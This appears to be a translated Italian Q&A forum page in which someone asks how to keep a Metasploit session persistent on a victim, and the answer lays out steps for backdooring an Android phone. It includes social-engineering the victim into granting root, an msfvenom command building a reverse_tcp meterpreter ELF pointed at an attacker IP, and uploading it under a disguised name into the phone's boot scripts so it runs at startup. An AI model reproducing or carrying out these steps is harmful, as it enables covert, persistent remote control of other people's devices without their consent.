In kali linux 2.0, quando eseguo exploit
in msfconsole e la vittima apre il mio payload, come posso forzare la sessione a essere persistente?
In kali linux 2.0, quando eseguo exploit
in msfconsole e la vittima apre il mio payload, come posso forzare la sessione a essere persistente?
Per le piattaforme Android, quando si utilizza il progetto metasploit-framework, è necessario utilizzare meterpreter come installazione APK per stabilire la persistenza.
Il download AndroidPayload è disponibile qui: link
Un post più dettagliato che spiega tutte le dipendenze può essere trovato qui: link
In parte un riassunto di ciò che è già stato detto:
1) Verifica se il target ha radicato il suo telefono . Se lo ha, usa l'ingegneria sociale per richiedere i privilegi di superutente tramite un prompt con
Runtime.getRuntime().exec("su");
E usa il processo di root per eseguire i passaggi 5 e 6
2) Altrimenti trova un exploit, ad esempio vai qui e scorri verso il basso ad android .
2.5) Spero che il bersaglio ignori il "Nuovo software disponibile!" richiesta spesso
3) Aumenta i privilegi della tua sessione su root. Se non puoi, non c'è fortuna. Spero che faccia pagare bene il suo telefono.
4) Crea un binario ELF che verrà eseguito all'avvio
msfvenom -p android/meterpreter/reverse_tcp -f elf LHOST= 192.168.43.107 LPORT=4444 R > /root/backdoor.elf
5) Copialo nella posizione remota con un nome normale (mountsd)
meterpreter> upload backdoor.elf /system/etc/init.d/92mountsd.elf
6) Esegui (o attendi il riavvio)
meterpreter> execute /system/etc/init.d/92mountsd.elf
Leggi altre domande sui tag metasploit